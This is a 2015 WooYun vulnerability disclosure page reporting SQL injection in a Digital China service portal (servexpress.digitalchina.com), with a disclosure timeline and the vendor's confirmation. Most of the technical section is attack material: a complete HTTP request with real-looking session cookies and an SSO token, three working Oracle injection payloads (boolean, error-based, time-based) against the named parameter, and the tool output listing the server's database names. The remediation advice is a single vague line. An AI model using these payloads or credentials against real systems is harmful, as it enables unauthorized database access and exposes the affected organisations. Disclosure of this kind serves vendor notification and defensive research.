当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140711

漏洞标题:神州数码某系统SQL注入(影响800多家企业\包括京东\沃尔玛等)

相关厂商:digitalchina.com

漏洞作者: 路人甲

提交时间:2015-09-12 22:33

修复时间:2015-10-29 09:24

公开时间:2015-10-29 09:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-12: 细节已通知厂商并且等待厂商处理中
2015-09-14: 厂商已经确认,细节仅向厂商公开
2015-09-24: 细节向核心白帽子及相关领域专家公开
2015-10-04: 细节向普通白帽子公开
2015-10-14: 细节向实习白帽子公开
2015-10-29: 细节向公众公开

简要描述:

只做了简单的处理。很容易绕过。

详细说明:

参数sn
影响参考: WooYun: 神州数码某系统SQL注入(影响800多家企业\包括京东\沃尔玛等)
POST /sms/reg/a.asp?func_id=Find&model=e&sn=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://servexpress.digitalchina.com/
Cookie: ASPSESSIONIDCAQCBTTQ=OIIPFFNBDKHFIHCDJNCEOINL; ASPSESSIONIDCASDATTQ=CGPDLMMBIHGCHABEPKKHLCFD; JSESSIONID=9A2269181A2C20A3826BC9FEF251141B.tomcat02; _ga=GA1.2.1073242692.1441976613; _gat=1; clientlanguage=zh_CN; Hm_lvt_d9874091f2c0f2204d7af1dfc269de5b=1441976615; Hm_lpvt_d9874091f2c0f2204d7af1dfc269de5b=1441976634; EZMSSO=B3B05FDA1FE9B74B598A20317D67F84070FF27719551E5D641995B7449DA9386C8F7BF2E4A08E99BA8D195BBA99E6D466FE2132C538C24565B0A6D83E75C9E5A52B472ED8B27ED2FBB3931F5E6CB80991CFE8D649AF3CD09B6FC989C59072591F394F0ECAD83C8826B50488582F4A7DF3D73561B1B20E059D977110E6472BCA57AB976C59E3DC9617782DAC2331EB5B31A982FC84466EE6D5BFA887E96D699AD967C84CE0FF3FA981C74C46D219BD8DE779F6E0CA01A7C5E8F458EBB1B6B658D004CAF95B17835DC54DA626F65F9256B7CCFC0C5B0C67A24C5E92BA26DD48D9284B3D513969BB2AAB4690EA89AAE1D6FABDC8BA40C9E8EB5021AF76AC45A8F20FBB50BC6F979936A325E8A24817646C080DE3ECEF3F35C20FE8037A37B6B7B9CDD9901E24DE9481277628946E9632C97B9FE3320BBF912166D42BC3C509EC544FDCA2129DCD687F03704499297F659182AAA1BDCA73A693081297DD46F72F25F8E84EDD1653EFB16FE7FE20729C59D401774700CD0854AF25CECA057ABA4D8E1DB640B7F0C0ECCD3DBBFBBFCC1D49B27; _error_remaining=2
Host: servexpress.digitalchina.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

漏洞证明:

---
Parameter: sn (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: func_id=Find&model=e&sn=-2470' OR 3751=3751 AND 'PsEo'='PsEo
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: func_id=Find&model=e&sn=1' AND 9098=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9098=9098) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(98)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'ZMJB'='ZMJB
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: func_id=Find&model=e&sn=1' AND 3467=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'TXNy'='TXNy
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Oracle
current user: 'ERS'
current user is DBA: False
available databases [13]:
[*] ERS
[*] PROJECTOR
[*] SXG
[*] SYS
[*] SYSTEM
[*] TOSHIBA
[*] U_AMD
[*] U_DELL
[*] U_HP
[*] U_KONICA
[*] U_MSI
[*] U_SEAGATE
[*] XDB

修复方案:

~~多检查。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-14 09:23

厂商回复:

尽快处理!

最新状态:

暂无